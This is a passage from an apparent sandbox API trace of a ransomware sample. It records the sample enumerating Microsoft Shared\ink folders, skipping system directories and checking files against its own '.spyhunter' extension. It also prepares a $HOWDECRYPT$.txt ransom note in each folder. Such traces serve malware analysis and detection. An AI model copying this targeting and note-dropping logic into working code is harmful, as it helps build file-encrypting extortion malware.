(lpString1="pt-PT", lpString2="System Volume Information") returned -1 [0087.270] lstrlenW (lpString="System Volume Information") returned 25 [0087.270] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT") returned 60 [0087.270] lstrcmpW (lpString1="pt-PT", lpString2=".") returned 1 [0087.270] lstrcmpW (lpString1="pt-PT", lpString2="..") returned 1 [0087.270] GetProcessHeap () returned 0x2c0000 [0087.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0087.271] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\*") returned 62 [0087.271] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0087.271] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.272] lstrlenW (lpString="Windows") returned 7 [0087.272] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.272] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.272] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.272] lstrlenW (lpString="System Volume Information") returned 25 [0087.272] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\.") returned 62 [0087.272] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.272] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.273] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.273] lstrlenW (lpString="Windows") returned 7 [0087.274] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.274] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.274] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.274] lstrlenW (lpString="System Volume Information") returned 25 [0087.274] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\..") returned 63 [0087.274] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.274] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.274] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.274] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0087.274] lstrlenW (lpString="Windows") returned 7 [0087.274] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0087.274] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.274] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0087.274] lstrlenW (lpString="System Volume Information") returned 25 [0087.274] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\tipresx.dll.mui") returned 76 [0087.274] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0087.274] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.274] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0087.274] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\tipresx.dll.mui") returned 76 [0087.274] GetProcessHeap () returned 0x2c0000 [0087.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x372fb0 [0087.275] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9b0) returned 0x3867e8 [0087.275] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0087.275] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0087.275] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\$HOWDECRYPT$.txt") returned 77 [0087.275] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\$HOWDECRYPT$.txt") returned 77 [0087.275] GetProcessHeap () returned 0x2c0000 [0087.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x373098 [0087.275] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9b8) returned 0x3867e8 [0087.275] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.275] lstrcmpiW (lpString1="ro-RO", lpString2="Windows") returned -1 [0087.275] lstrlenW (lpString="Windows") returned 7 [0087.275] lstrcmpiW (lpString1="ro-RO", lpString2="$Recycle.bin") returned 1 [0087.275] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.275] lstrcmpiW (lpString1="ro-RO", lpString2="System Volume Information") returned -1 [0087.275] lstrlenW (lpString="System Volume Information") returned 25 [0087.275] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO") returned 60 [0087.275] lstrcmpW (lpString1="ro-RO", lpString2=".") returned 1 [0087.275] lstrcmpW (lpString1="ro-RO", lpString2="..") returned 1 [0087.275] GetProcessHeap () returned 0x2c0000 [0087.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0087.275] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\*") returned 62 [0087.276] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0087.276] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.276] lstrlenW (lpString="Windows") returned 7 [0087.276] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.276] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.276] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.276] lstrlenW (lpString="System Volume Information") returned 25 [0087.276] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\.") returned 62 [0087.276] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.276] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.276] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.276] lstrlenW (lpString="Windows") returned 7 [0087.276] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.276] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.277] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.277] lstrlenW (lpString="System Volume Information") returned 25 [0087.277] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\..") returned 63 [0087.277] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.277] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.277] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.277] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0087.277] lstrlenW (lpString="Windows") returned 7 [0087.277] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0087.277] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.277] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0087.277] lstrlenW (lpString="System Volume Information") returned 25 [0087.277] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\tipresx.dll.mui") returned 76 [0087.277] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0087.277] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.277] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0087.277] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\tipresx.dll.mui") returned 76 [0087.277] GetProcessHeap () returned 0x2c0000 [0087.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x373268 [0087.277] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9c0) returned 0x3867e8 [0087.278] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0087.278] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0087.278] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\$HOWDECRYPT$.txt") returned 77 [0087.278] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\$HOWDECRYPT$.txt") returned 77 [0087.278] GetProcessHeap () returned 0x2c0000 [0087.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x373438 [0087.278] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9c8) returned 0x3867e8 [0087.278] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.278] lstrcmpiW (lpString1="rtscom.dll", lpString2="Windows") returned -1 [0087.278] lstrlenW (lpString="Windows") returned 7 [0087.278] lstrcmpiW (lpString1="rtscom.dll", lpString2="$Recycle.bin") returned 1 [0087.278] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.278] lstrcmpiW (lpString1="rtscom.dll", lpString2="System Volume Information") returned -1 [0087.278] lstrlenW (lpString="System Volume Information") returned 25 [0087.278] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\rtscom.dll") returned 65 [0087.278] StrStrIW (lpFirst="rtscom.dll", lpSrch=".spyhunter") returned 0x0 [0087.278] lstrcmpW (lpString1="rtscom.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.278] lstrcmpW (lpString1="rtscom.dll", lpString2="_uninstalling_.png") returned 1 [0087.278] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\rtscom.dll") returned 65 [0087.278] GetProcessHeap () returned 0x2c0000 [0087.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x358060 [0087.279] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9d0) returned 0x3867e8 [0087.279] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.279] lstrcmpiW (lpString1="ru-RU", lpString2="Windows") returned -1 [0087.279] lstrlenW (lpString="Windows") returned 7 [0087.279] lstrcmpiW (lpString1="ru-RU", lpString2="$Recycle.bin") returned 1 [0087.279] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.279] lstrcmpiW (lpString1="ru-RU", lpString2="System Volume Information") returned -1 [0087.279] lstrlenW (lpString="System Volume Information") returned 25 [0087.279] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU") returned 60 [0087.279] lstrcmpW (lpString1="ru-RU", lpString2=".") returned 1 [0087.279] lstrcmpW (lpString1="ru-RU", lpString2="..") returned 1 [0087.279] GetProcessHeap () returned 0x2c0000 [0087.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0087.279] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\*") returned 62 [0087.279] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0087.281] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.281] lstrlenW (lpString="Windows") returned 7 [0087.281] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.281] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.281] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.281] lstrlenW (lpString="System Volume Information") returned 25 [0087.281] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\.") returned 62 [0087.282] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.282] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.282] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.282] lstrlenW (lpString="Windows") returned 7 [0087.282] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.282] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.282] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.282] lstrlenW (lpString="System Volume Information") returned 25 [0087.282] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\..") returned 63 [0087.282] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.282] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.282] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.282] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0087.282] lstrlenW (lpString="Windows") returned 7 [0087.282] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0087.282] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.282] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0087.282] lstrlenW (lpString="System Volume Information") returned 25 [0087.282] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\tipresx.dll.mui") returned 76 [0087.282] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0087.282] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.282] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0087.282] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\tipresx.dll.mui") returned 76 [0087.282] GetProcessHeap () returned 0x2c0000 [0087.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x373520 [0087.282] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9d8) returned 0x3867e8 [0087.282] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0087.282] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0087.282] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\$HOWDECRYPT$.txt") returned 77 [0087.283] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\$HOWDECRYPT$.txt") returned 77 [0087.283] GetProcessHeap () returned 0x2c0000 [0087.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x373608 [0087.283] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9e0) returned 0x3867e8 [0087.283] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.283] lstrcmpiW (lpString1="ShapeCollector.exe", lpString2="Windows") returned -1 [0087.283] lstrlenW (lpString="Windows") returned 7 [0087.283] lstrcmpiW (lpString1="ShapeCollector.exe", lpString2="$Recycle.bin") returned 1 [0087.283] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.283] lstrcmpiW (lpString1="ShapeCollector.exe", lpString2="System Volume Information") returned -1 [0087.283] lstrlenW (lpString="System Volume Information") returned 25 [0087.283] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe") returned 73 [0087.283] StrStrIW (lpFirst="ShapeCollector.exe", lpSrch=".spyhunter") returned 0x0 [0087.283] lstrcmpW (lpString1="ShapeCollector.exe", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.283] lstrcmpW (lpString1="ShapeCollector.exe", lpString2="_uninstalling_.png") returned 1 [0087.283] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe") returned 73 [0087.283] GetProcessHeap () returned 0x2c0000 [0087.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x384b80 [0087.283] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9e8) returned 0x3867e8 [0087.283] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.283] lstrcmpiW (lpString1="sk-SK", lpString2="Windows") returned -1 [0087.283] lstrlenW (lpString="Windows") returned 7 [0087.283] lstrcmpiW (lpString1="sk-SK", lpString2="$Recycle.bin") returned 1 [0087.283] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.283] lstrcmpiW (lpString1="sk-SK", lpString2="System Volume Information") returned -1 [0087.283] lstrlenW (lpString="System Volume Information") returned 25 [0087.283] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK") returned 60 [0087.283] lstrcmpW (lpString1="sk-SK", lpString2=".") returned 1 [0087.283] lstrcmpW (lpString1="sk-SK", lpString2="..") returned 1 [0087.283] GetProcessHeap () returned 0x2c0000 [0087.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0087.283] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\*") returned 62 [0087.283] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0087.284] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.284] lstrlenW (lpString="Windows") returned 7 [0087.284] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.284] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.284] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.284] lstrlenW (lpString="System Volume Information") returned 25 [0087.284] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\.") returned 62 [0087.284] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.284] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.284] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.284] lstrlenW (lpString="Windows") returned 7 [0087.284] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.284] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.284] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.284] lstrlenW (lpString="System Volume Information") returned 25 [0087.284] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\..") returned 63 [0087.284] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.285] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.285] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.285] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0087.285] lstrlenW (lpString="Windows") returned 7 [0087.285] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0087.285] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.285] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0087.285] lstrlenW (lpString="System Volume Information") returned 25 [0087.285] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\tipresx.dll.mui") returned 76 [0087.285] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0087.285] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.285] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0087.285] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\tipresx.dll.mui") returned 76 [0087.285] GetProcessHeap () returned 0x2c0000 [0087.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x3736f0 [0087.285] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9f0) returned 0x3867e8 [0087.285] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0087.285] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0087.285] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\$HOWDECRYPT$.txt") returned 77 [0087.285] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\$HOWDECRYPT$.txt") returned 77 [0087.285] GetProcessHeap () returned 0x2c0000 [0087.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x373820 [0087.286] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9f8) returned 0x3867e8 [0087.286] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.286] lstrcmpiW (lpString1="sl-SI", lpString2="Windows") returned -1 [0087.286] lstrlenW (lpString="Windows") returned 7 [0087.286] lstrcmpiW (lpString1="sl-SI", lpString2="$Recycle.bin") returned 1 [0087.286] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.286] lstrcmpiW (lpString1="sl-SI", lpString2="System Volume Information") returned -1 [0087.286] lstrlenW (lpString="System Volume Information") returned 25 [0087.286] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI") returned 60 [0087.286] lstrcmpW (lpString1="sl-SI", lpString2=".") returned 1 [0087.286] lstrcmpW (lpString1="sl-SI", lpString2="..") returned 1 [0087.286] GetProcessHeap () returned 0x2c0000 [0087.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0087.286] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\*") returned 62 [0087.286] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0087.287] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.287] lstrlenW (lpString="Windows") returned 7 [0087.287] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.287] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.287] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.287] lstrlenW (lpString="System Volume Information") returned 25 [0087.287] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\.") returned 62 [0087.287] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.287] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.287] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.287] lstrlenW (lpString="Windows") returned 7 [0087.287] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.287] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.287] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.287] lstrlenW (lpString="System Volume Information") returned 25 [0087.287] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\..") returned 63 [0087.287] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.287] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.287] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.287] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0087.287] lstrlenW (lpString="Windows") returned 7 [0087.287] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0087.287] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.287] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0087.287] lstrlenW (lpString="System Volume Information") returned 25 [0087.287] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui") returned 76 [0087.287] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0087.287] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.287] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0087.287] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui") returned 76 [0087.287] GetProcessHeap () returned 0x2c0000 [0087.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x373908 [0087.288] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa00) returned 0x3867e8 [0087.288] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0087.288] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0087.288] wnsprintfW (in: 